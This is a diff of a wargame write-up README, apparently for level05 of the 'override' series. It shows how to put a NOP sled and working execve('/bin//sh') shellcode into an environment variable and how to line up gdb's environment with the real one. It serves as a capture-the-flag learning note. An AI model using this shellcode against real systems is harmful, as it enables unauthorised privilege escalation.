lumenthi/override/level05/Ressources/README.txt

 ==================================================================================================================

-# I put a NOPsland before my shellcode because if the stack is not starting exactly
+# I put a NOPsland before my shellcode because the stack is not starting exactly
 # At the same address (difference between real env and GDB)
-# We have a chance to jump in the NOPs and continuing our execution to our shellcode
+# We have a chance to jump in the NOPs and continuing execution to our shellcode
 env SHELLCODE=$(python -c 'print "\x90"*64+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"') gdb level05
 # I unset GDB's env to be the closest to the real env
 (gdb) unset env LINES